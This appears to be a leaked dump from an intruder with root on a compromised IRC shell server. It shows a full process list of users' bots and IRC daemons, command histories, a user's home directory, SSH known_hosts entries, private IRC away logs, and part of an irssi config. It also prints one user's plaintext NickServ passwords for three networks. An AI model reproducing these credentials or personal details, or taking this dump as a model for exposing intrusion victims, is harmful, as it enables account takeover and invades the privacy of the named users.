devil 43953 0.0 0.1 1592 620 ?? Ss 6Jul08 75:48.71 ./energymech
smash 44333 0.0 0.2 3936 1920 ?? Ss 5May09 22:54.47 /usr/home/smash/wraith/wraith fpck
ltootle 48390 0.0 0.2 7040 2456 ?? S 26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
root 51233 0.0 0.2 2268 1784 ?? Ss 11:50PM 0:07.93 screen
lordy 51655 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51656 0.0 0.0 0 0 ?? Z 8Jun09 0:00.01 <defunct>
lordy 51657 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51658 0.0 0.0 0 0 ?? Z 8Jun09 0:00.01 <defunct>
lordy 51659 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51660 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51661 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51662 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51663 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51664 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51665 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51668 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51669 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
y2j 53333 0.0 0.2 3296 1680 ?? S 22May09 4:05.27 ./psybnc
y2j 53335 0.0 0.3 4796 2992 ?? S 22May09 6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
y2j 53336 0.0 0.4 6032 3608 ?? S 22May09 7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
ltootle 54810 0.0 0.1 8336 992 ?? S 26Jun08 24:35.00 ./services
bruhaha 59704 0.0 0.0 1528 0 ?? IWs - 0:00.00 ./bnc
root 60582 0.0 0.2 5400 2036 ?? Is 3:32AM 0:00.60 sshd: romeo [priv] (sshd)
romeo 60584 0.0 0.2 5384 2088 ?? S 3:32AM 0:09.86 sshd: (sshd)
root 63283 0.0 0.2 2332 1828 ?? Is Wed10PM 0:01.12 screen
root 64492 0.0 0.1 2772 604 ?? Is 17Jun09 4:12.85 /usr/sbin/sshd
bruhaha 67858 0.0 0.1 1544 616 ?? Ss 23Aug08 17:43.63 ./bnc
bruhaha 70843 0.0 0.0 1516 0 ?? IWs - 0:00.00 ./bnc
dealer 78536 0.0 0.1 8176 1316 ?? S 14Mar09 220:01.22 php dealbot.php
own3d 82309 0.0 0.1 2820 728 ?? Is 15Oct08 3:35.17 ./sbnc
lymelyte 88242 0.0 0.2 7720 2084 ?? Ss 29Mar09 4:33.70 ./epona
poolboy 89012 0.0 0.4 5752 3984 ?? S 8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
redrum 91676 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum 91678 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum 91682 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
root 92538 0.0 0.0 0 8 ?? DL Thu08AM 0:00.08 [accounting]
root 93821 0.0 0.1 1436 844 ?? Is Thu08AM 0:00.00 inetd
root 98040 0.0 0.2 5368 2016 ?? Is 4:35PM 0:00.04 sshd: ioplex [priv] (sshd)
ioplex 98044 0.0 0.4 7364 4052 ?? I 4:35PM 0:02.03 sshd: ioplex (sshd)
crazie 98542 0.0 0.4 9732 3884 ?? S 19May09 36:58.07 ./l
crazie 98871 0.0 0.3 9236 3152 ?? S 19May09 13:26.08 ./mb2
crazie 99303 0.0 0.2 7512 2324 ?? S 19May09 7:43.22 ./mb6
root 1033 0.0 0.0 1344 0 v0 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv0
root 1034 0.0 0.0 1344 0 v1 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv1
root 1035 0.0 0.0 1344 0 v2 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv2
root 1036 0.0 0.0 1344 0 v3 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv3
root 1037 0.0 0.0 1344 0 v4 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv4
root 1038 0.0 0.0 1344 0 v5 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv5
root 1039 0.0 0.0 1344 0 v6 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv6
root 1040 0.0 0.0 1344 0 v7 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv7
darien9 2420 0.0 0.1 114060 1208 p0- S 16Mar08 799:19.15 ./psybnc
manboo 9260 0.0 0.1 3676 924 p0- S 22Apr08 20:51.79 ircd: irc.thederka.com (ircd)
manboo 11135 0.0 0.1 4288 620 p0- S 22Apr08 4:36.07 ./services
ac1115 21918 0.0 0.1 21512 1200 p0- S 2Jul08 15:39.60 ./psybnc
devil 22201 0.0 0.2 21412 1712 p0- S 2Nov08 46:45.70 ./psybnc
bpunux 27500 0.0 0.1 9476 1136 p0- S 31Oct08 9:22.64 ./psybnc
bpunux 28911 0.0 0.1 3068 976 p0- S 31Oct08 6:58.93 ./psybnc
tarawa 33111 0.0 0.3 29660 2640 p0- S 14Mar08 106:21.81 ./psybnc
reznik 33517 0.0 0.1 40788 1268 p0- S 27Apr08 44:00.81 ./psybnc
genosyde 34316 0.0 0.1 3192 1464 p0- S 5Jun08 39:10.11 ./eggdrop -m (eggdrop-1.6.18)
chrirc 40199 0.0 0.1 4248 628 p0- S 12Jun08 3:50.57 ./services
vamp 44090 0.0 0.2 3936 2464 p0- S 27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
vamp 44142 0.0 0.2 8352 2400 p0- S 27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
vamp 44170 0.0 0.2 3720 2120 p0- S 27Jan08 93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
darien9 46897 0.0 0.1 84316 1384 p0- S 1Apr08 1518:35.73 ./psybnc
romeo 51236 0.0 0.2 3268 1836 p0 Is 11:50PM 0:00.03 /usr/local/bin/bash
romeo 51241 0.0 0.7 9932 6740 p0 S+ 11:50PM 0:34.89 irssi -h absolute.ownage.net
burnt 59824 0.0 0.3 5952 3156 p0- S 27Jan08 54:17.27 ircd: wasted.ufc-pride.org (ircd)
burnt 59989 0.0 0.1 9012 1108 p0- S 27Jan08 5:52.73 ./services
sharpie 63388 0.0 0.2 3908 2172 p0- S 27Jan08 61:39.10 ./eggdrop egg (eggdrop-1.6.15)
daali 79885 0.0 0.3 5032 2656 p0- S 28Jan08 55:47.60 ./eggdrop (eggdrop-1.6.18)
darkevil 84286 0.0 0.1 3868 704 p0- S 25Mar08 17:04.32 ircd: irc.darkquest.org (ircd)
sharpie 95504 0.0 0.2 3812 2140 p0- S 25Apr08 53:07.90 ./eggdrop sun (eggdrop-1.6.15)
sharpie 95593 0.0 0.2 3708 2148 p0- S 25Apr08 51:59.24 ./eggdrop spank (eggdrop-1.6.15)
root 22120 0.0 0.2 3220 1888 p1 Ss 9:16PM 0:00.03 -bash (bash)
root 22827 0.0 0.1 1648 980 p1 R+ 9:32PM 0:00.00 ps -auxwww
dark 3869 0.0 0.2 31228 2488 p2- S 22Apr09 11:35.44 ./psybnc
romeo 4433 0.0 0.1 2040 1448 p2 S+ 7:09PM 0:00.04 screen -r
mooo 10652 0.0 0.2 41984 2284 p2- S 21May09 11:44.09 ./psybnc
tlm 11616 0.0 0.2 27520 1788 p2- S 26Apr09 4:20.44 ./psybnc
vamp 18167 0.0 0.1 29116 1320 p2- S 5Apr08 23:34.92 ./psybnc
wchan21 29220 0.0 0.2 10628 2024 p2- S 30Apr09 7:46.46 ./psybnc psybnc.conf
mimik0r 29613 0.0 0.2 5176 2248 p2- S 30May09 3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
psycoz 29853 0.0 0.1 3248 1404 p2- S 7Jun09 1:13.18 ./psybnc
zeepysea 33510 0.0 0.1 1424 620 p2- S 20Mar08 291:26.11 ./bopm
lordy 33773 0.0 0.1 6120 1468 p2- S 30May09 440:58.20 ./bot
lordy 33777 0.0 0.1 3848 944 p2- S 30May09 360:11.97 ./bot
lordy 33783 0.0 0.2 7468 1684 p2- S 30May09 444:16.39 ./bot
lordy 33807 0.0 0.1 4696 1024 p2- S 30May09 439:42.64 ./bot
lordy 33811 0.0 0.1 5784 1088 p2- S 30May09 443:07.55 ./bot
narcissu 34556 0.0 0.1 136368 564 p2- S 20Feb08 38:20.52 ./psybnc
cmm 37284 0.0 0.2 22500 1724 p2- S 13Apr09 6:35.61 ./psybncD
devil 43929 0.0 0.2 15176 2316 p2- S 22May09 8:40.13 sshd
yaquis 47275 0.0 0.2 2976 1680 p2- S 6Jun09 1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
chaos1 48442 0.0 0.3 3400 2812 p2- S 10:44PM 0:07.40 ircd: irc.sonicanime.net (ircd)
chaos1 48822 0.0 0.7 8296 7116 p2- S 10:52PM 0:01.09 /home/chaos1/core/anope/host/services
chaos1 49843 0.0 0.6 7060 6444 p2- S 11:19PM 1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
tarawa 51960 0.0 3.6 82452 36732 p2- S 17May09 10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
yaquis 52945 0.0 0.1 1432 960 p2- S 12:31AM 0:48.93 ./bopm
mlh 54757 0.0 0.2 3620 2108 p2- S 8Apr09 8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
safety 59083 0.0 0.2 3316 1752 p2- S 22May09 1:49.86 ./psybnc
brosco 59827 0.0 0.2 3912 2532 p2- S 1Jun09 3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
romeo 60586 0.0 0.2 3244 1900 p2 Is 3:32AM 0:00.05 -bash (bash)
cpu 60695 0.0 0.2 12308 1880 p2- S 22May09 2:16.63 ./gramicci
bollox 61265 0.0 0.2 3556 2068 p2- S 1May09 5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
dealer 74736 0.0 0.2 3180 1636 p2- S 8Apr09 6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
ircjaymz 75110 0.0 0.1 10012 1220 p2- S 18Mar08 24:56.65 ircd: ircdt.com (ircd)
redrum 80211 0.0 0.6 9244 6144 p2- S 9Jun09 9:12.34 ./eggdrop (eggdrop-1.6.19)
redrum 80260 0.0 0.6 6868 5764 p2- S 9Jun09 2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
bollox 80752 0.0 0.2 3812 2152 p2- S 7Apr09 8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
cazz1961 81636 0.0 0.2 3236 1784 p2- S 8May09 11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
poolboy 85768 0.0 2.3 38696 23352 p2- S 13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
qfx 85944 0.0 0.2 3592 2016 p2- S 10Jun09 0:53.81 ./psybnc
tarawa 88344 0.0 3.0 31980 30444 p2- S 26May09 5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
bollox 90551 0.0 0.3 4188 2616 p2- S 10Jun09 4:03.14 ./psybnc
darien9 363 0.0 0.1 126420 1276 p3- S 6Mar08 967:34.73 ./psybnc
sysc 3001 0.0 0.1 53544 1492 p3- S 27Jan08 28:52.73 ./psybnc
sqd 15833 0.0 0.1 19444 1436 p3- S 4Aug08 27:53.54 ./psybnc
crazyl 37528 0.0 0.1 20120 1464 p3- S 27Nov08 8:58.67 ./psybnc
en0prcv 58418 0.0 0.1 67988 1228 p3- S 4Apr08 97:19.44 ./psybnc
skypilot 65653 0.0 0.0 7460 388 p3- S 19Nov08 2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
chevym4n 6472 0.0 0.1 5156 772 p4- S 27Jan08 17:56.69 ircd: pdev.SummitIRC.com (ircd)
cpu 10289 0.0 0.2 27016 2152 p4- S 14Apr09 5:33.20 ./subdue
cpu 10303 0.0 0.2 24588 1896 p4- S 14Apr09 4:56.34 ./arc
oby1 18390 0.0 0.1 103980 1392 p4- S 8Oct08 37:31.06 ./psybnc
skypilot 43173 0.0 0.1 5612 968 p4- S 3Nov08 10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
cmm 60721 0.0 0.3 100744 3488 p4- S 10Apr09 50:30.96 ./psybncC
cmm 60933 0.0 0.3 31732 2888 p4- S 10Apr09 26:32.93 ./psybncB
cmm 61190 0.0 0.2 26200 2420 p4- S 10Apr09 14:16.41 ./psybncR
pimpinjg 63286 0.0 0.2 3268 1776 p4 Is Wed10PM 0:00.03 /usr/local/bin/bash
pimpinjg 63289 0.0 0.9 12636 9372 p4 S+ Wed10PM 1:16.45 irssi -h 72.20.28.217
darien9 74450 0.0 0.2 38220 2084 p4- S 31Oct08 107:35.62 ./psybnc
digitalman 97383 0.0 0.2 12644 2436 p4- S 20May09 6:43.68 ./psybnc psybnc.conf
chevym4n 11847 0.0 0.1 5892 756 p6- S 25Oct08 13:16.82 ircd: irc.SummitIRC.com (ircd)
crrj13 60894 0.0 0.4 14816 4384 p6- S 6May09 1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
lynx 71244 0.0 0.1 15292 1164 p6- S 27Aug08 13:54.41 ./psybnc
yaquis 81249 0.0 0.2 2952 1664 p6- S 5Jun09 2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
yaquis 81862 0.0 5.6 58788 57552 p6- S 13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
darien9 95226 0.0 0.1 7876 1096 p6- S 23Jul08 20:45.03 ./psybnc
baxxta 95367 0.0 0.1 8020 1144 p6- S 22Jul08 13:11.93 ./psybnc
yaquis 98909 0.0 0.1 3140 1312 p6- S 30May09 1:26.70 ./psybnc
nardi 18637 0.0 0.1 1480 680 p7- S 10Mar09 33:41.69 ./bopm
crash 29763 0.0 0.3 32276 3504 p7- S 30Jan09 164:54.34 ./psybnc1
mlh 52784 0.0 0.3 4584 3340 p7- S 10Jan09 22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
nyakz 54517 0.0 0.2 30984 2448 p7- S 13Mar09 52:56.09 ./psybnc
nardi 76675 0.0 0.1 5024 912 p7- S 8Feb09 7:16.69 ircd: Java.Albworld.Net (ircd)
sqd 77187 0.0 0.2 3352 1584 p7- S 21Jan09 13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
darkuno3 77376 0.0 0.1 3400 792 p7- S 10Mar09 4:06.45 ircd: 72.20.28.219 (ircd)
lyhne1 88130 0.0 0.4 10540 3712 p7- S 22Dec08 69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
lymelyte 88229 0.0 0.3 3880 3016 p7- S 29Mar09 7:28.37 ircd: irc.ftaresource.com (ircd)
chozen1 89082 0.0 0.1 3192 1032 p7- S 1Mar09 5:32.87 ./psybnc
kokoryu 93127 0.0 0.3 4060 2852 p7- S 6Feb09 32:11.57 ./eggdrop (eggdrop-1.6.19)
hts 96224 0.0 0.6 39004 6252 p7- S 2Mar09 51:21.25 ircd: vital.irc.hackthissite.org (ircd)
visage 96264 0.0 0.2 3192 1692 p7- S 13Mar09 9:27.48 ./eggdrop -m (eggdrop-1.6.19)
mrts 24165 0.0 0.2 3176 1612 p8- S 28Mar09 7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
jax66 57226 0.0 0.1 1516 652 p8- S 11May09 24:51.69 ./bopm
brosco 58343 0.0 0.2 15992 1800 p8- S 29Mar09 8:13.84 ./psybnc
dv327 76866 0.0 0.1 27624 1208 p8- S 9Aug08 15:14.39 ./psybnc
subkult 88094 0.0 0.1 72724 1280 p8- S 15Jan09 80:54.12 ./psybnc
bluewish 97486 0.0 0.2 3552 1852 p8- S 29Mar09 8:28.42 ./eggdrop (eggdrop-1.6.19)
brosco 31552 0.0 0.3 3792 2592 p9- S 16Mar09 14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
mrts 32626 0.0 0.2 3176 1620 p9- S 20Mar09 8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
poolboy 44789 0.0 0.2 3448 1956 p9- S 9Feb09 15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
poolboy 44901 0.0 0.2 3312 1896 p9- S 9Feb09 15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
bollox 60129 0.0 0.3 5308 3376 p9- S 4Jun09 2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
bollox 60150 0.0 0.3 5164 3280 p9- S 4Jun09 2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
brosco 76877 0.0 0.2 3760 2348 p9- S 19Mar09 13:04.80 ./eggdrop-1.6.19 -m plague.conf
crash 99452 0.0 0.2 37052 2128 p9- S 19Mar09 12:20.42 ./psybnc-oth
paleride 265 0.0 0.2 3648 2092 pb- S 27Jan09 19:36.88 ircd: irc.leechnet.net (ircd)
paleride 908 0.0 0.1 4276 788 pb- S 27Jan09 1:40.52 ./services -nofork
grumpy 79140 0.0 0.3 5576 2692 pb- S 4Feb09 16:37.28 ircd: irc.sidnaceous.com (ircd)
grumpy 82947 0.0 0.1 7572 1140 pb- I 4Feb09 1:28.12 ./services start
nardi 17529 0.0 0.1 25992 1028 pc- S 24Mar09 23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
cazz1961 17100 0.0 0.6 8824 6268 pd- S Sun06AM 87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
omgwtf 29455 0.0 0.2 3408 1996 pd- S Sat04AM 0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
omgwtf 29570 0.0 0.2 3572 2228 pd- S Sat04AM 0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
zeepysea 37950 0.0 0.2 3684 1952 pd- S 17Mar09 10:42.06 ircd: irc.eoegameservers.com (ircd)
zeepysea 38077 0.0 0.1 8204 1092 pd- S 17Mar09 1:07.05 ./services start
genosyde 63662 0.0 0.2 17308 2432 pd- S 27Jan09 21:57.28 ./psybnc
matt 83686 0.0 0.1 3140 1184 pd- S Sat05PM 0:17.40 ./psybnc psybnc.conf
mrts 84263 0.0 0.2 3172 1636 pd- S 20Mar09 8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
yaquis 94000 0.0 0.5 58432 5312 pd- S Fri10PM 4:51.24 ircd: irc2.accesox.net (ircd)
cont 49538 0.0 0.2 19684 1784 pe- S 11Jan09 12:46.04 ./psybnc
chaos1 56819 0.0 0.8 11604 8064 pf- I 18Jun09 0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
[root@velocity:/var/run]#
[root@velocity:~]# lastcomm -u romeo
sh - romeo __ 0.00 us
ls - romeo __ 0.00 us
screen -F romeo __ 0.00 us
screen -F romeo __ 0.00 us
w - romeo ttyp1 0.00 us
sh - romeo ttyp1 0.00 us
sshd -F romeo __ 0.59 us
bash - romeo ttyp1 0.00 us
ls - romeo ttyp1 0.00 us
w - romeo ttyp1 0.00 us
screen - romeo ttyp1 0.00 us
screen -F romeo __ 0.00 us
screen -F romeo __ 0.00 us
screen -F romeo __ 0.00 us
w - romeo ttyp1 0.00 us
sh - romeo ttyp1 0.00 us
[root@velocity:~]# lastcomm -u pimpinjg
sshd -F pimpinjg __ 0.00 us
bash - pimpinjg ttyp2 0.00 us
screen - pimpinjg ttyp2 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
fortune - pimpinjg ttyp2 0.00 us
sshd -F pimpinjg __ 0.00 us
sftp-server - pimpinjg __ 0.02 us
sshd -F pimpinjg __ 0.03 us
bash - pimpinjg ttyp2 0.00 us
tput - pimpinjg ttyp2 0.00 us
screen - pimpinjg ttyp2 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
fortune - pimpinjg ttyp2 0.00 us
[root@velocity:/home/romeo]# ls -la
total 80
drwxr-xr-x 4 romeo romeo 512 Jun 27 21:56 ./
drwx--x--x 204 root wheel 3584 Jun 17 18:30 ../
-rw------- 1 romeo romeo 5 Jun 17 18:35 .bash_history
-rw-r--r-- 1 romeo romeo 44 Jun 13 08:05 .bash_profile
-rw-r--r-- 1 romeo romeo 2469 Jun 13 08:00 .bashprompt
-rw-r--r-- 1 romeo romeo 258 Jun 13 08:03 .bashrc
-rw-r--r-- 1 romeo romeo 767 Jun 13 07:56 .cshrc
-rw-r--r-- 1 romeo romeo 23 Jun 17 18:39 .forward
drwx------ 4 romeo romeo 512 Jun 17 09:42 irclogs/
drwx------ 3 romeo romeo 512 Jun 17 09:42 .irssi/
-rw------- 1 romeo romeo 35 Jun 26 17:58 .lesshst
-rw-r--r-- 1 romeo romeo 248 Jun 13 07:56 .login
-rw-r--r-- 1 romeo romeo 158 Jun 13 07:56 .login_conf
-rw------- 1 romeo romeo 373 Jun 13 07:56 .mail_aliases
-rw-r--r-- 1 romeo romeo 331 Jun 13 07:56 .mailrc
-rw-r--r-- 1 romeo romeo 797 Jun 13 07:56 .profile
-rw------- 1 romeo romeo 276 Jun 13 07:56 .rhosts
-rw-r--r-- 1 romeo romeo 975 Jun 13 07:56 .shrc
drwx------ 2 romeo romeo 512 Jun 20 02:58 .ssh/
[root@velocity:/home/romeo]# cat .ssh/known_hosts
72.20.6.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYSZga5G62dznPwCooUV5e+kVQ8861IxS3aw3ZkDt9uzLZswbqN4iQmkP7bokLACE7Oz2nIiKkVwcjCF8qqO3lk4pdIJNxg6hTuQcZzPR9IHiK38ajERh2JlPPq1zyCwTvPJK8qTNuwZTcdrlJHrFcZpatepHSTu9hdjb+gF4e1oQNyC20nLtD0w1789tFfJKu/5J5jNEOtj7NyfqEwr3nN2iok4LbdZfK321htZwouCWcC2alEacjuYkcRZylgmxhek5dBqLO+LZTvyuppFTiz8RCmwbVSNK+NVgkj4e4WFcR9CoLh2mfW6o4EfE3d9cxFl9Jk/IHLYPQ/TRbaPVw==
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
opteron1.ircvps.com,98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
quad1.ircvps.com,89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
[root@velocity:/home/romeo]#
[root@velocity:/home/romeo/.irssi]# ls -la
total 108
drwx------ 3 romeo romeo 512 Jun 17 09:42 ./
drwxr-xr-x 4 romeo romeo 512 Jun 27 21:56 ../
-rw------- 1 romeo romeo 4500 Jun 28 02:13 away.log
-rw-r--r-- 1 romeo romeo 9591 Jun 27 22:51 config
-rw-r----- 1 romeo romeo 584 Jun 17 07:16 config.old
-rw-r----- 1 romeo romeo 8472 Jun 27 21:56 default.theme
-rw-r--r-- 1 romeo romeo 8466 Feb 20 16:08 fear2.theme
-rw------- 1 romeo romeo 70 Jun 17 07:31 nickserv.auth
-rw-r--r-- 1 romeo romeo 74 Jun 17 07:31 nickserv.networks
-rw-r--r-- 1 romeo romeo 4667 Jun 27 21:56 pandemonium.theme
drwxr-xr-x 3 romeo romeo 512 Jun 22 17:50 scripts/
[root@velocity:~]#
[root@velocity:/home/romeo/.irssi]# cat nickserv.auth
secchat RoMeO ve2aZCp3GYoq
bhf RoMeO ra7plmyt
tdirc RoMeO sidfh928rf783
[root@velocity:~]#
[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log
--- Log opened Tue Jun 30 01:08:25 2009
01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e
02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
--- Log closed Tue Jun 30 04:12:51 2009
--- Log opened Tue Jun 30 19:19:25 2009
19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
--- Log closed Tue Jun 30 20:06:56 2009
--- Log opened Tue Jun 30 21:22:55 2009
21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
--- Log closed Tue Jun 30 22:17:55 2009
--- Log opened Wed Jul 01 00:59:13 2009
--- Log closed Wed Jul 01 01:00:01 2009
--- Log opened Wed Jul 01 01:00:23 2009
01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e
01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e
01:34 #bhf: (c+c>/HTHg) ehis response: <RoMeO> when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
01:34 #bhf: (cc8/Darkg8/:3/Romeog) e
01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
--- Log closed Wed Jul 01 02:43:40 2009
--- Log opened Wed Jul 01 03:32:17 2009
--- Log closed Wed Jul 01 03:32:22 2009
--- Log opened Wed Jul 01 03:32:24 2009
--- Log closed Wed Jul 01 05:38:09 2009
--- Log opened Wed Jul 01 06:53:32 2009
--- Log closed Wed Jul 01 06:53:36 2009
--- Log opened Wed Jul 01 06:53:44 2009
07:03 #darkmindz: (c&c>/Xiresg) e<RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
[root@velocity:/]#
[root@velocity:/home/romeo/.irssi]# cat config
servers = (
{ address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
{ address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
{
address = "irc.undernet.org";
chatnet = "Undernet";
port = "6667";
},
{ address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
